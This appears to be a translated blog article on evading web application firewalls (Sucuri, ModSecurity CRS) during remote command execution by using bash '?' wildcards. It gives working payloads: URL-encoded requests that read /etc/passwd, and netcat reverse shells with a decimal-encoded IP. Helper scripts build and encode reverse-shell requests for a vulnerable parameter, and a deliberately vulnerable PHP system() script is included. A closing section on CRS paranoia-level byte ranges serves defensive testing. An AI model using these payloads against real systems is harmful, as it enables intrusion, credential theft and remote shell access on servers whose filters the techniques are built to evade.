How to bypass a Web Application Firewall (WAF)?

Disclaimer: This article is original content of the Coisini community and may not be reproduced without permission. https://blog.csdn.net/kclax/article/details/91435887

Finding a remote command execution vulnerability in a web application is not uncommon; in the OWASP Top 10 2017 list, "Injection" sits in first place:

Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

All modern web application firewalls can intercept RCE attempts, but when the target runs on a Linux system there is a way to circumvent the WAF rule set.

In penetration testing, wildcard characters are extremely useful. Before you start a WAPT (web application penetration test), here is something you may not know about bash and its wildcards.

Special wildcard usage

Bash standard wildcards (also called glob patterns) are used by many command-line utilities to process multiple files at once. Not everyone knows that bash syntax lets you execute system commands using nothing but the question mark ?, the forward slash /, digits, and letters. You can even enumerate files and read their contents with the same handful of characters. A few examples: you can replace the ls command with the following syntax:
/???/?s
With this syntax you can basically do anything you want. Suppose the vulnerable target sits behind a WAF, and the WAF has a rule that blocks every request whose GET parameter values or POST body contain /etc/passwd or /bin/ls.

If you send a request such as /?cmd=cat+/etc/passwd, the target WAF will block it, and your IP will be permanently banned and labelled as yet another f***in' redteamer. But you have a secret weapon: wildcards.

If the target WAF does not block ? and / in the query string, you can easily turn your request (URL-encoded) into this: /?cmd=%2f???%2f??t%20%2f???%2fp??s??
As shown in the figure, there are three errors of the form /bin/cat: ...: Is a directory. This happens because the shell expands /???/??t not only to /bin/cat but also to /dev/net, /etc/apt and similar paths, and every extra match is passed to cat as an additional argument.

The question mark wildcard stands for exactly one character of any kind, so if you know part of a file name you can use it to fill in the rest. For example, ls *.??? lists every file in the current directory whose extension is three characters long, so you will see files with extensions such as .gif, .jpg and .txt.
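As an added example (not code from the original post), the following script builds a constructed directory tree containing the paths the article relies on and shows what each wildcard pattern actually expands to, including the ambiguous matches that cause the "Is a directory" errors. The fake tree, including the nl binary next to nc, is an assumption made for the demo; on a real target the same check is done with echo.

```shell
#!/bin/sh
# Added example, not part of the original post: expand a wildcard payload the
# way the shell will before the command runs, on a constructed directory tree
# (on a real host this is the target's filesystem).

# glob_expand PATTERN: print every existing path the pattern resolves to,
# one per line. The shell leaves an unmatched pattern as-is, so the -e test
# filters that case out and nothing is printed.
glob_expand() {
    for _m in $1; do
        [ -e "$_m" ] && printf '%s\n' "$_m"
    done
    return 0
}

# glob_count PATTERN: how many paths the pattern expands to. A payload is
# only unambiguous when this is exactly 1; every extra match becomes an
# extra argument to the command.
glob_count() {
    glob_expand "$1" | wc -l | tr -d ' '
}

# make_fake_root: constructed tree (assumption for the demo) with the paths
# the article relies on plus the look-alikes that collide with them.
# Prints the root directory.
make_fake_root() (
    root=$(mktemp -d)
    mkdir -p "$root/bin" "$root/etc/apt" "$root/dev/net"
    for f in cat ls nc nl; do : > "$root/bin/$f"; done
    : > "$root/etc/passwd"
    printf '%s' "$root"
)

# Show the expansions of the article's patterns relative to the fake root.
demo() {
    r=$(make_fake_root)
    for p in '/???/?s' '/???/??t' '/???/??ss??' '/???/n?'; do
        printf '%s -> %s match(es)\n' "$p" "$(glob_count "$r$p")"
        glob_expand "$r$p" | sed "s,^$r,,"
    done
    rm -rf "$r"
}

demo
```

Because the shell sorts matches, /???/??t turns into cat /dev/net /etc/apt /etc/passwd on a tree like this one, which is exactly the error shown in the figure; /???/n? is ambiguous as soon as /bin/nl exists beside /bin/nc. Running echo with the pattern on the target before using it is the cheap way to catch both cases.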

Using wildcards you can also spawn a reverse shell with netcat. Suppose you need a reverse shell to port 1337 of 127.0.0.1 (normally nc -e /bin/bash 127.0.0.1 1337); you can do it with the following syntax:
/???/n? -e /???/b??h 2130706433 1337

Translating the IP address 127.0.0.1 into its long-integer form (2130706433) avoids using the . character in the HTTP request.

On Kali it is necessary to use nc.traditional instead of nc, because the default nc has no -e parameter for executing /bin/bash after the connection. The payload then becomes (one ? for each character of "traditional"):

/???/?c.??????????? -e /???/b??h 2130706433 1337

[Figure: using wildcards to spawn a reverse shell]

To summarize the two commands we have just seen:

Standard: /bin/nc 127.0.0.1 1337
Bypass: /???/n? 2130706433 1337
Characters used: / ? n [0-9]

Standard: /bin/cat /etc/passwd
Bypass: /???/??t /???/??ss??
Characters used: / ? t s
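As an added example that is not part of the original post, the following script assembles the two payloads from the summary above step by step, so that each transformation (wildcard form, decimal IP, percent-encoding) can be checked on its own before the request is sent. The address 127.0.0.1, port 1337 and the cmd parameter name are the article's; the function names are assumptions made for the demo.

```shell
#!/bin/sh
# Added example, not part of the original post: build the summary's payloads
# from their parts so each step can be verified in isolation.

# ip_to_long A.B.C.D: the address as one decimal integer. As the article
# notes, netcat accepts this form, and it contains no '.' for a WAF to match.
ip_to_long() {
    set -- $(printf '%s' "$1" | tr '.' ' ')
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# long_to_ip N: the inverse, used to confirm the conversion round-trips.
long_to_ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# encode_for_query S: percent-encode '/' and ' ' the way the article's request
# does. The '?' characters stay literal because they are the wildcards.
encode_for_query() {
    printf '%s' "$1" | sed -e 's,/,%2f,g' -e 's/ /%20/g'
}

# cat_payload FILE_PATTERN: /???/??t (cat) followed by the file pattern.
cat_payload() {
    printf '%s\n' "/???/??t $1"
}

# reverse_shell_payload IP PORT: /???/n? (nc) -e /???/b??h (bash) with the
# address in decimal form.
reverse_shell_payload() {
    printf '%s\n' "/???/n? -e /???/b??h $(ip_to_long "$1") $2"
}

# request_path PARAM PAYLOAD: the GET path to send to the vulnerable script.
request_path() {
    printf '%s\n' "/?$1=$(encode_for_query "$2")"
}

request_path cmd "$(cat_payload '/???/p??s??')"
request_path cmd "$(reverse_shell_payload 127.0.0.1 1337)"
```

The first line printed is the request shown earlier in the article; the second is the reverse-shell request with the same encoding. Before firing either one, the expansion of every glob in it should be checked on the target with echo, since an extra match becomes an extra argument.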

Why use ? rather than *? Because * is widely used in comment syntax, and many WAFs filter it to prevent SQL injection such as UNION+SELECT+1,2,3/*

Using echo to enumerate files and directories. The echo command can enumerate files and directories on the file system by means of wildcards, for example echo /*/ss*. The same command can be issued through an RCE vulnerability to list the files and directories on the target system.
But why does using wildcards (the question mark in particular) bypass the WAF?
Sucuri WAF 绕过
[Figure: three-pane screenshot of the Sucuri WAF test]
What is the best way to test a WAF rule set? Create a vulnerable PHP script and try every possible technique. In the top-left pane of the figure above is a vulnerable PHP script:

<?php
      // Deliberately vulnerable test script: the c parameter goes straight to system()
      echo 'ok: ';
      print_r($_GET['c']);
      system($_GET['c']);

In the bottom-left pane you can see the remote command execution test against this site (test1.unicresit.it). As you can see, the Sucuri WAF blocks the request with the reason "An attempted RFI/LFI was detected and blocked".
The right pane shows the same request but using ? as a wildcard: the Sucuri WAF does not block it, and the application executes the command placed in the c parameter. At this point /etc/passwd can be read, and much more.

I can read the PHP source of the application itself, spawn a reverse shell with netcat (/???/?c), or run curl or wget to obtain the web server's real IP address, which lets me bypass the WAF altogether by connecting to the target directly.

ModSecurity OWASP CRS 3.0
The following excerpt from the CRS rule file gives a good overview of how the REQUEST PROTOCOL ENFORCEMENT rules work at each paranoia level. PL1 allows query strings containing ASCII codes in the range 1-255; from PL1 up to PL4, fewer and fewer ASCII codes are allowed.



# -=[ Targets and ASCII Ranges ]=-
#
# 920270: PL1
# REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES
# ASCII: 1-255
# Example: Full ASCII range without null character
#
# 920271: PL2
# REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES
# ASCII: 9,10,13,32-126,128-255
# Example: Full visible ASCII range, tab, newline
#
# 920272: PL3
# REQUEST_URI, REQUEST_HEADERS, ARGS, ARGS_NAMES, REQUEST_BODY
# ASCII: 32-36,38-126
# Example: Visible lower ASCII range without percent symbol
#
# 920273: PL4
# ARGS, ARGS_NAMES and REQUEST_BODY
# ASCII: 38,44-46,48-58,61,65-90,95,97-122
# Example: A-Z a-z 0-9 = - _ . , : &
#
# 920274: PL4
# REQUEST_HEADERS without User-Agent, Referer, Cookie
# ASCII: 32,34,38,42-59,61,65-90,95,97-122
# Example: A-Z a-z 0-9 = - _ . , : & " * + / SPACE
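As an added example that is not part of CRS or the original post, the following shell script re-implements the byte-range check behind rules 920270-920273 for the ARGS target, using the ranges from the comment block above, and runs the page's payloads through it to find the first paranoia level at which each one is rejected on character range alone. It checks the decoded parameter value, which is what ARGS holds; the sample payloads are constructed, and the script models only the range rules, not the command and path signatures that other CRS rule families apply.

```shell
#!/bin/sh
# Added example, not part of CRS or the original post: the byte-range check
# of rules 920270-920273 for ARGS, with the ranges copied from the CRS
# comment block above, applied to constructed sample payloads.

# ranges_for_pl PL: allowed decimal byte values for ARGS at that level.
ranges_for_pl() {
    case "$1" in
        1) echo "1-255" ;;
        2) echo "9,10,13,32-126,128-255" ;;
        3) echo "32-36,38-126" ;;
        4) echo "38,44-46,48-58,61,65-90,95,97-122" ;;
        *) echo "unknown paranoia level: $1" >&2; return 1 ;;
    esac
}

# in_ranges BYTE SPEC: succeed when BYTE falls inside one of the
# comma-separated items of SPEC, each written as "n" or "lo-hi".
in_ranges() {
    for _item in $(printf '%s' "$2" | tr ',' ' '); do
        case "$_item" in
            *-*) _lo=${_item%-*}; _hi=${_item#*-} ;;
            *)   _lo=$_item;      _hi=$_item ;;
        esac
        if [ "$1" -ge "$_lo" ] && [ "$1" -le "$_hi" ]; then
            return 0
        fi
    done
    return 1
}

# first_rejected_byte PL PAYLOAD: decimal value of the first byte of the
# (already URL-decoded) argument value that the level's range rule rejects;
# prints nothing when every byte is allowed.
first_rejected_byte() {
    _spec=$(ranges_for_pl "$1") || return 1
    for _b in $(printf '%s' "$2" | od -An -tu1); do
        if ! in_ranges "$_b" "$_spec"; then
            echo "$_b"
            return 0
        fi
    done
    return 0
}

# lowest_blocking_pl PAYLOAD: first level from 1 to 4 whose range rule
# rejects the payload, or "none" if even PL4 accepts every byte.
lowest_blocking_pl() {
    for _pl in 1 2 3 4; do
        if [ -n "$(first_rejected_byte "$_pl" "$1")" ]; then
            echo "$_pl"
            return 0
        fi
    done
    echo none
}

# Constructed sample payloads: the plain command, the wildcard form, a harmless one.
for p in 'cat /etc/passwd' '/???/??t /???/??ss??' 'id'; do
    printf '%-24s first rejected by range rule at PL: %s\n' "$p" "$(lowest_blocking_pl "$p")"
done
```

Reading the listing the same way: ? is byte 63 and / is byte 47, and neither appears in the 920273 ranges for ARGS, so the wildcard payload survives the range rules up to PL3 and is stopped at PL4 on its very first character; the plain cat /etc/passwd also passes the range rules through PL3 (its space, byte 32, is the first byte PL4 rejects), which is why the range rules alone are not what catches it at lower levels.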

Paranoia Level 0 (PL0)
At PL0 almost no protection rules are enabled, so our code runs as expected.

